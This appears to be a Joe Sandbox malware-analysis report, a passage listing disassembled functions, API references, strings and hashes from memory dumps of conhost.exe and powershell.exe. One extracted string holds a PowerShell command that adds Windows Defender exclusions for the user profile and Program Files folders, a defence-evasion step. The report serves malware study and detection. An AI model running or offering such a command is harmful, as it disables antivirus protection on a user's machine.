memcpy.MSVCRT ref: 00007FF6EB43D1BE
free.MSVCRT ref: 00007FF6EB43D1C9

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: freememcpystrlen
String ID:
API String ID: 2208669145-0
Opcode ID: c38db2172cfd9ae85e9a883efc34efb28d12d5d224bd24a361e312a999cd5c63
Instruction ID: 38c9c533ea50aa33719c106f85b10d7e471b42fae95de4da2564e67b5fd56846
Opcode Fuzzy Hash: c38db2172cfd9ae85e9a883efc34efb28d12d5d224bd24a361e312a999cd5c63
Instruction Fuzzy Hash: C0310763A0D642D1FA626E116E4837891606F897E0F1C4230ED5DA7BFCDE3DD449830B

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB446280 Relevance: 6.1, APIs: 4, Instructions: 92COMMON

Download Yara Rule

APIs

IsDBCSLeadByteEx.KERNEL32 ref: 00007FF6EB4462DA
MultiByteToWideChar.KERNEL32 ref: 00007FF6EB44631A

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: Byte$CharLeadMultiWide
String ID:
API String ID: 2561704868-0
Opcode ID: 2afb99f2ee01c53e0d00abda62e8cbbf8cc0c827b66b9bada8882682575d719f
Instruction ID: 66aa87953a95e4e37b51063a2905608f4c439687da8c228d4e71882d812df52b
Opcode Fuzzy Hash: 2afb99f2ee01c53e0d00abda62e8cbbf8cc0c827b66b9bada8882682575d719f
Instruction Fuzzy Hash: 1231C773A0C6D1C6E3604F65B4003AD36A0BB88754F588175EA98C77E9CF3ED49ACB05

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB4333E0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF6EB433401
wcslen.MSVCRT ref: 00007FF6EB43349D

Strings

0, xrefs: 00007FF6EB433452
@, xrefs: 00007FF6EB433463

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: wcslen
String ID: 0$@
API String ID: 4088430540-1545510068
Opcode ID: 7672fed0b8996f53dcc22994f3d6380cf8a7774dacfee888ad8ec0ec5c6d97f5
Instruction ID: 43f9203b635bf991cf92537642e3d60c068741ff74efacdb396524939c7aaf7d
Opcode Fuzzy Hash: 7672fed0b8996f53dcc22994f3d6380cf8a7774dacfee888ad8ec0ec5c6d97f5
Instruction Fuzzy Hash: FB212C3261878086E3208BA9F44579BB6B4FBC8794F544135EB8887B69EF7DD059CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB4386A5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 63stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6EB43A129

Strings

this, xrefs: 00007FF6EB4386B1
{parm#, xrefs: 00007FF6EB43A103
}, xrefs: 00007FF6EB43A1B6

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: strlen
String ID: this${parm#$}
API String ID: 39653677-3278767634
Opcode ID: 6f0bfb9d8981c506edbbfefa79d7d61ad08a34af9d75f983c161daac188581c0
Instruction ID: 7dcce3cdf6aece54b59c52b66014cab3d709c33f864844e2d74f4606f4273d2d
Opcode Fuzzy Hash: 6f0bfb9d8981c506edbbfefa79d7d61ad08a34af9d75f983c161daac188581c0
Instruction Fuzzy Hash: 35219473A8C686C1EB268F2494043FD2291EB09B94F4C4032CE4D4B76DDF7E948AC366

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB433590 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF6EB4335A9
wcslen.MSVCRT ref: 00007FF6EB4335C7

Strings

@, xrefs: 00007FF6EB433608
0, xrefs: 00007FF6EB4335F7

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: wcslen
String ID: 0$@
API String ID: 4088430540-1545510068
Opcode ID: 3c516be1024ba130d95ecd01f241a1d218f72ae396bc0abe8a08652b93ab77ee
Instruction ID: 82d12c3580c25b514c551640d37957c6602e0c2759aad2bde90a10f0744603ef
Opcode Fuzzy Hash: 3c516be1024ba130d95ecd01f241a1d218f72ae396bc0abe8a08652b93ab77ee
Instruction Fuzzy Hash: B9118F22618B8186E7109BA5F48539BA770EFC8354F540135FB8C87B69EF7EC48ACB04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB433500 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF6EB433512

Strings

0, xrefs: 00007FF6EB433540
@, xrefs: 00007FF6EB433551
%S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force, xrefs: 00007FF6EB433500

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: wcslen
String ID: %S Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force$0$@
API String ID: 4088430540-3278736299
Opcode ID: fdb8abad6e72a7b41242dcd54f2c36b93f86f5da5fb55729cbb4a91078180f25
Instruction ID: ccca69274cde80a48966c7e6d0687dd5bfee1739f4824bdc0650d77fb775496d
Opcode Fuzzy Hash: fdb8abad6e72a7b41242dcd54f2c36b93f86f5da5fb55729cbb4a91078180f25
Instruction Fuzzy Hash: 01F08162628780C2E7108BA4F08939AA370EBC8354F641125F78C87B69EF3DC5958B04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB43D450 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF6EB43D4C9

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6EB43D4B9
Unknown error, xrefs: 00007FF6EB43D540

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-3474627141
Opcode ID: a32f6bde19f3212d88517c0bbb2d0dc8b7ac313c33bdf2c9871b021261022c37
Instruction ID: 80a9a88dc9293757fb9ad4033c664ff5fb6cb1814c2d65201d7a039fc6addd41
Opcode Fuzzy Hash: a32f6bde19f3212d88517c0bbb2d0dc8b7ac313c33bdf2c9871b021261022c37
Instruction Fuzzy Hash: 4E01A923908E88C2D6128F1CD8012EA7374FF9E79AF245321EA8C66234DF2AD557C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB43D510 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF6EB43D4C9

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6EB43D4B9
Total loss of significance (TLOSS), xrefs: 00007FF6EB43D510

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4273532761
Opcode ID: 67d5240dc17468b9f01daf06f5fc5db78ffbb280dddb193a6db7ce23348b68e9
Instruction ID: eeaf11c9e9b30f10159501bb5e885e6d108c4259b1de9e0544a57acb53c2cea1
Opcode Fuzzy Hash: 67d5240dc17468b9f01daf06f5fc5db78ffbb280dddb193a6db7ce23348b68e9
Instruction Fuzzy Hash: C5F06213908E88C2D2018F1CA8002FAB370FF9E789F685325EACD76538DF2AD6578704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB43D500 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF6EB43D4C9

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6EB43D4B9
The result is too small to be represented (UNDERFLOW), xrefs: 00007FF6EB43D500

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: fprintf
String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2187435201
Opcode ID: e7b94ecd4896b4551adee426744aa3e5072b9381a04d8ab2df02db5d513518aa
Instruction ID: 0ba641bc1922b7ed5be4af2022124b119f5c3f54080dff35307b3648232e1fa4
Opcode Fuzzy Hash: e7b94ecd4896b4551adee426744aa3e5072b9381a04d8ab2df02db5d513518aa
Instruction Fuzzy Hash: C3F06213908E88C2D2018F1CA8002AAB370FF9E789F685325EA8D76578DF2AD6578704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB43D530 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF6EB43D4C9

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6EB43D4B9
Argument singularity (SIGN), xrefs: 00007FF6EB43D530

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2468659920
Opcode ID: c91a2dc0f6ff7d737807e0476af162ad0af9d5283553f49d171d24ddf17aa2d3
Instruction ID: b9baf2fb9f919a8f401f2064eb91ac376e646149a8b43c996e9dbffc8a67432b
Opcode Fuzzy Hash: c91a2dc0f6ff7d737807e0476af162ad0af9d5283553f49d171d24ddf17aa2d3
Instruction Fuzzy Hash: 19F06853908E88C1D201CF1CA4001AA7371FF5E789F585325DA8D76534DF29D5578704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB43D520 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF6EB43D4C9

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6EB43D4B9
Partial loss of significance (PLOSS), xrefs: 00007FF6EB43D520

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4283191376
Opcode ID: 83a1a42ba51afc0977b47f15b4cc2797ba7c15fed2a33f244b538e2cfb76ad28
Instruction ID: bd08564df51834cd210785110b5109ae05659a68b2a0fd08df933e2ae1ba23c8
Opcode Fuzzy Hash: 83a1a42ba51afc0977b47f15b4cc2797ba7c15fed2a33f244b538e2cfb76ad28
Instruction Fuzzy Hash: F1F06813908E88C1D2018F1CA4001AAB370FF5E789F585325EA8D76574DF29D5578704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB43D4F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF6EB43D4C9

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6EB43D4B9
Overflow range error (OVERFLOW), xrefs: 00007FF6EB43D4F0

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-4064033741
Opcode ID: 444463960d407b565cb1ce2de017aac15f1105bab8b8e63de992e1bddc256739
Instruction ID: 6772089ee98055ad43e3a2b1ec74d454376bb6675be28162958307e861149e84
Opcode Fuzzy Hash: 444463960d407b565cb1ce2de017aac15f1105bab8b8e63de992e1bddc256739
Instruction Fuzzy Hash: 49F06853918E88C1D2018F1CA4001AA7370FF5E789F585325EA8D76574DF29D5578704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB43D481 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON

Download Yara Rule

APIs

fprintf.MSVCRT ref: 00007FF6EB43D4C9

Strings

_matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00007FF6EB43D4B9
Argument domain error (DOMAIN), xrefs: 00007FF6EB43D481

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: fprintf
String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
API String ID: 383729395-2713391170
Opcode ID: 6c1bb04fb518506022f5e99638b645748c5ad941913315fb580250ab61dbfd81
Instruction ID: 86ddf7c8bf55c33c83ce867d8d8d978d7c4d5f5fea3cb95dd5c30a629f9044a4
Opcode Fuzzy Hash: 6c1bb04fb518506022f5e99638b645748c5ad941913315fb580250ab61dbfd81
Instruction Fuzzy Hash: FFF06217904E8882D2018F18A4001AAB370FF5E789F545325EE8D26528DF29D5578704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6EB43DE70 Relevance: 5.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF6EB43DE97
free.MSVCRT ref: 00007FF6EB43DEE8
LeaveCriticalSection.KERNEL32 ref: 00007FF6EB43DEF4

Memory Dump Source

Source File: 0000003C.00000002.4572624485.00007FF6EB431000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6EB430000, based on PE: true

Associated: 0000003C.00000002.4572561186.00007FF6EB430000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572677737.00007FF6EB44B000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572718408.00007FF6EB44D000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB454000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572748818.00007FF6EB456000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000003C.00000002.4572827453.00007FF6EB459000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_60_2_7ff6eb430000_conhost.jbxd

Similarity

API ID: CriticalSection$EnterLeavefree
String ID:
API String ID: 4020351045-0
Opcode ID: d5f71ea9b2ba0dc7262754e9b7f3f9d6a9cc23ee47e911203c7931b1a1512ad6
Instruction ID: 90db0113e3de9bf0ca950c572f24bfb17867f5825369bfff379a5f843513ff3b
Opcode Fuzzy Hash: d5f71ea9b2ba0dc7262754e9b7f3f9d6a9cc23ee47e911203c7931b1a1512ad6
Instruction Fuzzy Hash: E6113023B0AE06D6EA54DB54AC8533827A1AFAC741F584434C40DC72BCDF7EE859830E

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 4132, Parent PID: 4004COMMON

Executed Functions

Function 00007FFD3489CE85 Relevance: 3.1, Strings: 2, Instructions: 640COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD3489CF39
uN_^, xrefs: 00007FFD3489CF01

Memory Dump Source

Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID: _$uN_^
API String ID: 0-4014890825
Opcode ID: ced9990eda290b2ac65105a85c2504cc2905d79b3047313610a9e591fbfc3724
Instruction ID: bf6772d7ebd79fc3cc193d86b16c0a677d6f48859bf2b87b92d6216785edde6c
Opcode Fuzzy Hash: ced9990eda290b2ac65105a85c2504cc2905d79b3047313610a9e591fbfc3724
Instruction Fuzzy Hash: C522D432B0CA8A8FEB55EF5CD8A55E97BE0FF56314F08017AD54DD7182DA29F8428780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3489CA15 Relevance: 1.7, Strings: 1, Instructions: 483COMMON

Download Yara Rule

Strings

wN_^, xrefs: 00007FFD3489CD01

Memory Dump Source

Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID: wN_^
API String ID: 0-475585179
Opcode ID: 5baf05195d86267e49d1deb7c56513d2f18edbbca1ce0b05b4f668506e1b3d1e
Instruction ID: d6732199f673e2ac5d4ba94513fb2ad5b3fd554285e6265f0f0ca91ca13bba6c
Opcode Fuzzy Hash: 5baf05195d86267e49d1deb7c56513d2f18edbbca1ce0b05b4f668506e1b3d1e
Instruction Fuzzy Hash: A3E14832A0CB865FE755DB1C88B55B97FE0EF57320B1801BED58AC7193DA1AB802C781

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD3489E0A5 Relevance: 1.7, Strings: 1, Instructions: 437COMMON

Download Yara Rule

Strings

H, xrefs: 00007FFD3489E23D

Memory Dump Source

Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 3427a9ad1c0bd8b20999f5632d765490ff20d3917bcab8a26d859766948c4bc4
Instruction ID: 9fbe3ac095a40616bf40a0d89b5df15900cf7c764fe8efa44ca9ec48b8fd5e14
Opcode Fuzzy Hash: 3427a9ad1c0bd8b20999f5632d765490ff20d3917bcab8a26d859766948c4bc4
Instruction Fuzzy Hash: D7E16030A08A4D8FDF99DF58C4A5EA97FE1FF69310F1441A9D44DD7296CA38E881CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD348935FA Relevance: .5, Instructions: 477COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a8b5739bedaccf5fc39ed9a2328054e0b58244e78dc2e9f2604c4325b10c738
Instruction ID: 9654b0218216040a6df577d8b18aa25827c68982167c72117ad8ab6d5c102194
Opcode Fuzzy Hash: 3a8b5739bedaccf5fc39ed9a2328054e0b58244e78dc2e9f2604c4325b10c738
Instruction Fuzzy Hash: 58F1C471A0CA4E8FDB95EB6CC4A5AEA7BE1FF59304F1401B9D00DD7286DA38E845D780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD34893E80 Relevance: .5, Instructions: 457COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000040.00000002.3043525148.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_64_2_7ffd34890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
